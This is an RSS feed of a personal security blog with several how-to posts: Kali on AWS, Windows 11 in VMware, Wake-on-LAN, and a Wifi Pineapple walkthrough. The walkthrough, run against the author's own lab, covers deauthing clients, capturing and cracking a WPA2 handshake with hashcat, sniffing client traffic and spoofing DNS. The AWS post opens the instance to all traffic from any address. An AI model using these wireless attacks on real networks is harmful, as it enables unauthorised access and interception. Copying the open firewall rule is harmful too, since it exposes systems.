<p>Now it was time for me to pick the OS I wanted my virtual machines to run. My initial plan was to go with something new but I had a couple years of experience with Debian-based distros. Thus, I ended up going with Ubuntu 20.04.3 for all my Linux Servers.</p>
<p>As for services, I had a couple of things I wanted to run.</p>
<ul>
<li>Cloud</li>
<li>Video Streaming Server</li>
<li>Music Streaming Server</li>
<li>Self-hosted Pastebin</li>
<li>Web Hosting Server
<ul>
<li>Personal Site</li>
<li>Personal Blog</li>
<li>Public Sites</li>
</ul>
</li>
<li>Qbittorrent Server</li>
</ul>
<p>These were just some of the things I had in mind at the start! We'll see how it goes in the next few posts.</p>
<hr />
<h2 id="heading-conclusion">Conclusion</h2>
<p>Now that I have the basics down, I'll be spending my free time upgrading/installing/configuring/exposing the servers and services! I'll be writing about my homelab process :) Can't wait to see how it'll go! Seeya in the next post 👋</p>
]]></content:encoded></item><item><title><![CDATA[Deploying Kali on AWS]]></title><description><![CDATA[Here's how you can deploy kali on AWS for free under the free tier (for a year). as long as you stay under the usage guidelines. I did this so I could have a quick and dirty VM I can make use of when I'm not at my desk! Lezgo!
Prerequisites

Free ver...]]></description><link>https://4pfsec.com/deploying-kali-on-aws</link><guid isPermaLink="true">https://4pfsec.com/deploying-kali-on-aws</guid><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Sun, 17 Oct 2021 08:04:41 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983332938/116b641a-2045-4f13-84af-6835b2ea9ed6.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983307000/f488ee0f-e927-4b53-80bd-f8ddd6eedbd4.jpeg" alt="Deploying Kali on AWS" /></p>
<p>Here's how you can deploy Kali on AWS for free under the free tier (for a year), as long as you stay under the usage guidelines. I did this so I could have a quick and dirty VM I can make use of when I'm not at my desk! Lezgo!</p>
<h2 id="heading-prerequisites">Prerequisites</h2>
<ul>
<li>Free verified AWS account</li>
</ul>
<h2 id="heading-deployment">Deployment</h2>
<p>Head to the AWS Management Console and search for <code>EC2</code>. EC2 is Amazon's version of a VPS.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983308163/c209e1c9-57ef-4d8c-8d8f-3e20e4fc75e2.png" alt="Deploying Kali on AWS" /></p>
<p>Once there, hit <code>Launch Instance</code> on the dashboard as shown below.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983310042/dcee05fd-6e3a-4810-bf87-8397f909f40b.png" alt="Deploying Kali on AWS" /></p>
<p>Next, hit <code>AWS Marketplace</code>. This shows a list of "ready to deploy" VMs that we can choose from.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983311543/76aa6dc6-31c7-4c13-a24c-1d706904eeb0.png" alt="Deploying Kali on AWS" /></p>
<p>Then, search for <code>kali</code> and hit <code>select</code>. Make sure you select the option that says <code>Free tier eligible</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983312967/e982d487-5cbf-41ff-b6fb-c3d1a410c4d4.png" alt="Deploying Kali on AWS" /></p>
<p>Once selected and verified, hit continue.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983314089/6b20d1bb-231a-406c-8fb6-d29a4c69b6fe.png" alt="Deploying Kali on AWS" /></p>
<p>At the <code>Instance Type</code> page, make sure to choose <code>t2.micro</code> which lets us use the free tier.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983315893/8fb49b06-be94-407f-843b-f4d772f26c7b.png" alt="Deploying Kali on AWS" /></p>
<p>[OPTIONAL] Configure the Security Group to your liking. I'm adding a rule to allow all traffic as this machine will be behind a proxy for my use case.</p>
<p>    Type - All traffic =&gt; any traffic flow in or out of the VM
    Protocol - All =&gt; Any kind of traffic going to or coming from the VM
    Port Range - 0-65535 =&gt; Allow all ports
    Source - 0.0.0.0/0 =&gt; Rules with source of 0.0.0.0/0 allow all IP addresses to access your instance</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983317736/24118d81-b5e1-4406-8bc3-5f246f008c20.png" alt="Deploying Kali on AWS" /></p>
<p>Once configured, hit Review and launch. AWS will require you to create a new ssh key pair to deploy the machine. Once created, remember to download the keypair before proceeding.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983318848/17d990de-85fb-4f3d-a6f2-8708ff0071c3.png" alt="Deploying Kali on AWS" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983320385/0dbc6cb6-40bd-42a0-a17b-e458c4198e2a.png" alt="Deploying Kali on AWS" /></p>
<p>Once the Instance State turns to <code>Running</code> we are all set!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983321443/500d8039-6409-401d-9657-b54a7fe862cd.png" alt="Deploying Kali on AWS" /></p>
<p>To verify that the system is up and running, let's <code>SSH</code> into it.</p>
<p>    ssh user@host -i cloudKali.pem</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983322729/86552c71-4908-47b9-bf36-41edf4b8f3a6.png" alt="Deploying Kali on AWS" /></p>
<p>All good! We now have Kali Linux in the cloud for absolutely free!</p>
<h2 id="heading-vm-configuration">VM Configuration</h2>
<p>A GUI would definitely be better than a CLI for the use case! Let's go ahead and set up a desktop environment together with VNC so we can access this over the web or even a VNC viewer later on.</p>
<p>Let's go ahead and install XFCE and the VNC server.</p>
<p>    ┌──(kali㉿kali)-[~]
    └─$ sudo apt-get install xfce4 xfce4-goodies tightvncserver -y</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983324131/520523cc-bb52-4918-ba00-f4d4d8b44ee2.png" alt="Deploying Kali on AWS" /></p>
<p>Once that's completed, let's install the desktop base.</p>
<p>    ┌──(kali㉿kali)-[~]
    └─$ sudo apt-get install gnome-core kali-defaults kali-root-login desktop-base -y</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983325583/12193a52-d23d-4a77-868a-3e9f69f20adb.png" alt="Deploying Kali on AWS" /></p>
<p>When prompted to configure gdm3, pick <code>lightdm</code> as the default display manager as shown below. As the name suggests, this is gonna be lighter on our system.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983326951/95621749-3fa8-41df-af23-c8870fcab599.png" alt="Deploying Kali on AWS" /></p>
<p>Now that that's done, let's configure the <code>tightvncserver</code>.</p>
<p>    ┌──(kali㉿kali)-[~]
    └─$ tightvncserver          </p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983328032/137c4c50-27dc-4e5e-8792-6c5b7b290252.png" alt="Deploying Kali on AWS" /></p>
<p>That's it. We're done configuring VNC and the GUI Desktop. Go ahead and onboard this VM to your favorite VNC viewers. I'll be onboarding it to my web-based VNC client that I have deployed on a proxy server. Once onboarded, you should be able to connect to the instance without any issues!</p>
<h2 id="heading-on-pc">On PC</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983329282/505b9e1a-b6f4-405c-a3db-e45e879adcab.png" alt="Deploying Kali on AWS" /></p>
<h2 id="heading-on-mobile">On Mobile</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983331639/d7000d97-1d25-4f13-940f-6c25ce5e16d6.png" alt="Deploying Kali on AWS" /></p>
<p>Pretty cool! Hope this helps someone out there :)</p>
]]></content:encoded></item><item><title><![CDATA[Installing Windows 11 on Vmware Workstation 16.2.0]]></title><description><![CDATA[I recently ran into an issue where I wasn't able to virtualize a copy of windows 11 on VMware. Here's how I got around that and managed to run a windows 11 pro VM on VMware.
Here's what It'd look like when you try to install windows 11 on VMware as a...]]></description><link>https://4pfsec.com/installing-windows-11-on-vmware-workstation-1620</link><guid isPermaLink="true">https://4pfsec.com/installing-windows-11-on-vmware-workstation-1620</guid><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Sat, 16 Oct 2021 07:20:48 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983365098/693ef523-0f49-4927-a4ea-c6cca38129ef.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983338806/8e7fe99f-3e94-4da6-a1f6-8b2a66853342.jpeg" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p>I recently ran into an issue where I wasn't able to virtualize a copy of Windows 11 on VMware. Here's how I got around that and managed to run a Windows 11 Pro VM on VMware.</p>
<p>Here's what it looks like when you try to install Windows 11 on VMware the usual way. This is due to the lack of TPM 2.0 and Secure Boot; here's how we can overcome this during virtualization.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983340852/a4e26074-eb49-4c65-a155-9addfdb25ecb.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<hr />
<h2 id="heading-prerequisites">Prerequisites</h2>
<ul>
<li>VMware Workstation Pro (I personally have not tested it on other platforms)</li>
<li><a target="_blank" href="https://www.microsoft.com/en-us/software-download/windows11">Windows 11 ISO file</a></li>
</ul>
<h2 id="heading-installation">Installation</h2>
<p>Create a new virtual machine with the wizard (Typical) as you would always do.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983342548/34506ae0-82ee-4e52-9756-7756d69460d4.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983344220/80e7a446-d6bc-4b9a-9d33-c8d4b6d989ba.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983345261/e3d1abc9-b8c3-4487-b5f8-b7ca6795b3dc.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983346197/0e07d59e-14f7-443b-a664-d7b9bb35dd94.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983347229/0337a0e8-a310-4058-bc2e-eb68b721142e.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p>Once the virtual machine is created, edit the virtual machine settings and change the following options as shown.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983349137/f7b34a96-8b70-4e30-bf93-799b13c7a6d8.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p>Enable the <code>Virtualize Intel VT-x/EPT or AMD-V/RVI</code> under the <code>Virtualization engine</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983350276/4b6ab514-9ade-4218-8e43-13da9c6b327f.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p>Then, head to Options &gt; Advanced and enable <code>Secure boot</code> under <code>Firmware Type</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983351281/2c037c61-7a56-47bf-8253-a1ad0ef195b4.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p>Lastly, we need to edit the <code>.vmx</code> file which makes up the VM.  </p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983352943/097c30ef-2152-4540-824a-3e166acddbaf.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983354116/a95e99fa-2e85-4348-8402-1a1a78d7cba3.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p>Head to the VM directory as shown above and add the following line as shown below.</p>
<p>    managedvm.autoAddVTPM="software"</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983355456/8f05b398-d958-4e27-af31-c77768b04ea3.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p>Once done, boot the virtual machine as per normal and follow through with the usual Windows installation.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983356558/ff51e1af-39a4-4326-a3f2-1a6be7952b8c.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983357578/86222860-4cb1-400d-84ce-81c904679de5.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p>Once you see the screen shown below, you're in the clear! You will be able to install Windows without any issues and virtualize it all you want!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983359453/b437385f-7f34-46ca-9efb-6cd61e4da4a9.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p>Just more proof.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983360643/99ae417c-ad02-4a31-bf63-85e9f82eeb7b.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p>And once everything installs, you should see the setup page as shown below!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983361725/139419e4-93b2-4dd0-b93f-7a8843574795.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983363111/5e19f4e4-5254-44e2-b1af-756d1ff272b3.png" alt="Installing Windows 11 on Vmware Workstation 16.2.0" /></p>
<p>😊 Hope this helped someone out there struggling with this issue! 💯</p>
]]></content:encoded></item><item><title><![CDATA[Enabling Wake-on-Lan on Windows 11]]></title><description><![CDATA[WOL is a pretty neat feature that allows a user to boot a pc via another server/system on the same network. For my use case, this helps me save electricity whenever I don't need my system to be running. My Windows 10 setup stopped functioning after t...]]></description><link>https://4pfsec.com/enabling-wake-on-lan-on-windows-11</link><guid isPermaLink="true">https://4pfsec.com/enabling-wake-on-lan-on-windows-11</guid><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Fri, 15 Oct 2021 20:16:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983382614/7342bf06-14a6-4096-b34a-1767e7c645e3.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983370886/395e9c2e-6963-448e-9665-45baf25d6265.jpeg" alt="Enabling Wake-on-Lan on Windows 11" /></p>
<p>WOL is a pretty neat feature that allows a user to boot a PC via another server/system on the same network. For my use case, this helps me save electricity whenever I don't need my system to be running. My Windows 10 setup stopped functioning after the upgrade to Windows 11. Here's how I got it working once again after the upgrade.</p>
<h2 id="heading-prerequisites">Prerequisites</h2>
<ul>
<li>Ensure that the motherboard supports WOL and the feature is enabled in the BIOS</li>
<li>A system with Windows 10/11</li>
</ul>
<h2 id="heading-wol-setup">WOL Setup</h2>
<p>To set up WOL, we need to first identify the ethernet adapter we want to use for WOL on the system. Hit <code>Windows + R</code> , enter the following command and hit <code>enter</code>.</p>
<p>    ncpa.cpl</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983372797/65ad7895-6720-4817-aa20-17f98fd438f2.png" alt="Enabling Wake-on-Lan on Windows 11" /></p>
<p>Next, locate your Ethernet adapter and head to the properties.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983374695/12a20d73-82e2-4a4a-aa69-659f71b6960c.png" alt="Enabling Wake-on-Lan on Windows 11" /></p>
<p>Hit configure once the ethernet properties window pops up.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983375810/918abab2-f125-456f-ab06-26c316c63b01.png" alt="Enabling Wake-on-Lan on Windows 11" /></p>
<p>After a new window pops up, head to the advanced tab and set <code>Wake on Magic Packet</code>'s value to <code>Enabled</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983377028/71df33a9-b0ad-4c60-ac8e-b52c13ec1f2a.png" alt="Enabling Wake-on-Lan on Windows 11" /></p>
<p>Next, we need to change some power management settings for the feature to work well. I missed out on a step during this step which cost me a couple of hours ☹️. Hit <code>Windows + R</code> , type the following command and hit <code>Enter</code>.</p>
<p>    powercfg.cpl</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983378062/e4c18c42-70e5-47f0-9927-0890fcbb1814.png" alt="Enabling Wake-on-Lan on Windows 11" /></p>
<p>Then, select <code>Change Plan Settings</code> for whichever plan you are currently using and hit <code>Change advanced power settings</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983379009/e2b17ce1-72ed-4aaa-8052-40cfdde8a2e8.png" alt="Enabling Wake-on-Lan on Windows 11" /></p>
<p>Head down to the <code>PCI Express</code> option and set it to <code>Off</code> as shown below.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983380285/5e22bdf9-22a0-4eb2-bdd7-20676f53b004.png" alt="Enabling Wake-on-Lan on Windows 11" /></p>
<p>Once that's done, head back to power options and select <code>Choose what the power buttons do</code> , hit <code>Change settings that are currently unavailable</code> and uncheck <code>Turn on fast startup</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983381381/9ea463a0-8342-4d51-b0ca-613ca2b2bd28.png" alt="Enabling Wake-on-Lan on Windows 11" /></p>
<p>Save changes and the system's all good to go! All that's left is to use another machine on the same local network and send a WOL magic packet to the router, specifying the MAC address of the Windows machine's network adapter.</p>
<p>Hope you didn't waste hours figuring this out 😄!</p>
]]></content:encoded></item><item><title><![CDATA[Wireless Hacking with the Wifi Pineapple 🍍]]></title><description><![CDATA[Wifi Penetration testing was always something I wanted to pick up. I recently got my hands on the hardware for it thanks to a mentor of mine which enabled me to perform a range of wireless attacks in my home lab environment! If you're interested in s...]]></description><link>https://4pfsec.com/wireless-hacking-with-the-wifi-pineapple</link><guid isPermaLink="true">https://4pfsec.com/wireless-hacking-with-the-wifi-pineapple</guid><category><![CDATA[tools]]></category><dc:creator><![CDATA[Nee]]></dc:creator><pubDate>Sun, 08 Aug 2021 16:27:20 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983461533/e88d7596-bfe6-4f3b-afba-ba811c7b0dea.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983386972/0f2bdde3-aa2d-4838-9132-5dc681938d36.jpeg" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>Wifi Penetration testing was always something I wanted to pick up. I recently got my hands on the hardware for it thanks to a mentor of mine which enabled me to perform a range of wireless attacks in my home lab environment! If you're interested in setting up your own Wifi Pineapple, check out my in-depth guide over on <a target="_blank" href="https://repo.4pfsec.com/wireless-penetration-testing/wifi-pineapple-tetra">my repo site</a>!</p>
<hr />
<h1 id="heading-capturing-wireless-handshake">Capturing Wireless Handshake</h1>
<p>Like every other penetration test, this starts with recon too! The first step to the attack would be to identify our "target". In this case, I will be attacking my <strong>own network</strong>.</p>
<h2 id="heading-recon">Recon</h2>
<h3 id="heading-scanning">Scanning</h3>
<ul>
<li>Access the Recon Tab</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983388311/3d217c07-fe8b-4e1f-ac78-14d17f835561.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<ul>
<li>Setup Scan Settings and Run Scan</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983389293/51585269-2b95-46e4-9ff7-e63b38211bf7.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<ul>
<li>Running Scan</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983390391/515c6b75-c232-4f53-8900-9bb90fb8ceb6.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<hr />
<h1 id="heading-targetting">Targeting</h1>
<p>Once the scan has run for a short period of time, multiple targets should start popping up (as seen below). These are all the networks within range of the Wifi 🍍.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983391956/ccf2c0be-4905-47e4-9b57-9d2719f89348.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<h2 id="heading-target-network">Target Network</h2>
<p>Here's the network I'll be attacking (shown below)!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983393819/2ade5364-3a2e-4ca2-9556-70bfa26115f5.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>It's evident that one client is currently authenticated with the network. The MAC address of the client is shown right below the router's MAC.</p>
<h1 id="heading-attacking">Attacking</h1>
<p>Now that we have our target and have verified that there are clients connected to it, we can conduct a deauth attack on the network and listen for handshakes destined to the network. Deauthenticating clients from a network will force them to reconnect to it. While the reconnection is happening, we would be able to sniff and capture the handshake which we can then use to crack :)</p>
<h2 id="heading-launching-attack">Launching Attack</h2>
<p>Hit the dropdown on the <code>security</code> tab</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983395169/fd13eba0-73b1-4b51-bdf8-651abd782e6c.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>Hit <code>Start Capture</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983396459/2efc9342-7de4-4b7c-903b-fdebf3da8ff0.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>Hit <code>Deauth</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983397826/169bfefc-21e7-4526-80d3-008ce9b011f6.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>Successful Capture of handshake</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983399949/29d4bb62-9e57-4d74-ad64-19d9c76efdc6.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>At this point, we have obtained a capture of the handshake which can then be used to crack the Pre-Shared Key (PSK) of the network with a trusty wordlist.</p>
<h2 id="heading-live-attack-on-client">Live Attack (On client)</h2>
<p>This is what the client would witness when the attack is underway. Most of the time we wouldn't even notice this happening when we are out and about, going through our regular day.</p>
<h3 id="heading-mobile">Mobile</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983402417/7bf2c063-3efe-4390-b7de-4aa9106de36c.gif" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<h3 id="heading-desktop">Desktop</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983404055/f2442f65-4929-4cc2-ae9e-d55fb15c3dc7.gif" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<hr />
<h1 id="heading-cracking-wpa2-handshake">Cracking WPA2 Handshake</h1>
<p>This section will cover how to crack WPA2 handshakes captured with the previously showcased attack vector.</p>
<h1 id="heading-cracking">Cracking</h1>
<p>We need to convert the captured <code>.pcap</code> file into <code>.hccapx</code> format in order to start cracking it. There's a tool named <code>cap2hccapx</code> which can help us do this. However, we first need to download and compile it on our Unix system.</p>
<h2 id="heading-compiling-cap2hccapx"><strong>Compiling cap2hccapx</strong></h2>
<p>Downloading Source</p>
<p>    wget https://raw.githubusercontent.com/hashcat/hashcat-utils/master/src/cap2hccapx.c</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983406783/13c1f703-4bbb-4590-b251-e41a3df66154.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>Compiling Tool</p>
<p>    gcc -o cap2hccapx cap2hccapx.c</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983408220/73f372af-da54-4638-baf5-ea23a725131e.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>Testing Tool</p>
<p>    ./cap2hccapx</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983410647/5ddbc0c2-811b-47b5-99ae-4402eff6e8a1.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<h2 id="heading-converting">Converting</h2>
<p>Now that we have the tool compiled and ready to go, we can convert the file and prep it for cracking!</p>
<p>    cap2hccapx E4-6F-13-FA-AD-E0_partial.pcap  capture.hccapx</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983412287/4554a979-2b7e-4afd-bce5-5cc238ff76e9.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<h2 id="heading-cracking-with-hccapx">Cracking with .hccapx</h2>
<p>I'll be using Hashcat for the cracking on my host machine. <a target="_blank" href="https://4pfsec.com/hashcat-password-cracking/">Here's</a> a post where I explain why cracking on the host machine is better 😊!</p>
<p>    .\hashcat.exe -m 2500 .\hashes\capture.hccapx .\wordlists\rockyou.txt --force</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983414869/7a1d3bba-3819-4e2a-8147-234d769d1222.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>    e46f13faade0:c6adf262679d:Nee2.4:tinkerbell</p>
<p><strong>tinkerbell</strong> is the PSK of the network in question.</p>
<p>We were successfully able to crack the handshake and retrieve the password to the lab network!</p>
<hr />
<h1 id="heading-modules">Modules</h1>
<p>This section contains information about community modules that can be used on top of the PineAP attack.</p>
<p><strong>Background</strong></p>
<p>The WiFi Pineapple was created with modularity in mind. The WiFi Pineapple supports community-developed modules in addition to the system modules supplied with the WiFi Pineapple, such as Recon, Clients, and PineAP. The WiFi Pineapple API is used by several community-developed modules to expand functionality. This API can be used by anybody to build modules for the WiFi Pineapple.</p>
<h1 id="heading-modules-1">Modules</h1>
<p>Let's take a look at some of the community-made modules in this section!</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983416966/27c7e715-a0eb-4ce2-b3be-5ea96f998247.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>We'll assume we already got our target to connect to our rogue network beforehand.</p>
<hr />
<h2 id="heading-tcpdump">TcpDump</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983418662/932cd063-1dd1-4a12-bbfa-5402c0784d35.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>This module is pretty self-explanatory. It assists us by dumping all network traffic generated by our clients. It comes in very handy when we want to inspect our clients' network traffic for insecure protocols and possibly sniff out passwords or files that were transferred.</p>
<h3 id="heading-demo">Demo</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983420788/70c5d149-b892-48f9-91b3-979e727eb300.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>Hit start and the capture will be running.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983422356/3398946f-590d-4343-b685-f338ed7c4592.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>Once done, hit stop and download the capture for analysis.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983423841/3a3fdaa1-8bfe-44a7-9569-9351b260301c.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983425296/e2e660c1-c1d9-49a8-94b4-96f160311e37.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<h3 id="heading-analysis">Analysis</h3>
<p>We can simply open the capture up with Wireshark and proceed with our analysis.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983427133/959ef523-a7fc-4367-9ce4-609c48abd483.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<hr />
<h2 id="heading-dwall">DWall</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983429691/52008d6a-e8d9-4535-a69e-f054a4590985.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>DWall is similar to TcpDump, but it focuses on the web! DWall displays plaintext <strong>HTTP</strong> URLs, cookies, POST data, and images from browsing clients. It has the same limitation as TcpDump: we will only be able to see insecure traffic!</p>
<h3 id="heading-demo-1">Demo</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983431904/57221ef5-5eaf-4331-8d4e-328aea1cf66d.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>Hit start listening to start capturing web traffic from clients.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983433560/f622ccef-27f2-4b69-87bd-131fc9f1d485.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>As the clients browse insecure sites, their data is relayed to us on this page (as shown below).</p>
<p><strong>Client View</strong></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983435356/fa28d517-7aee-4ba2-8b7b-284de904700e.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p><strong>Wifi 🍍 View</strong></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983437423/4e973dee-dd86-4780-be62-38f8f6e6c3a1.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<hr />
<h2 id="heading-dnsmasq-spoof">DNSMasq Spoof</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983439058/2d9dd3c8-16a2-4085-ad75-9ae0344c5b73.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>This module forges replies to arbitrary DNS queries using DNSMasq.</p>
<h3 id="heading-demo-2">Demo</h3>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983441145/e7b57992-6c0a-4579-9477-28d5d2d95966.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
<p>Hit Start to run the spoofer.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1680983442866/a71d4ad4-eb32-43fe-aba7-286f70895652.png" alt="Wireless Hacking with the Wifi Pineapple 🍍" /></p>
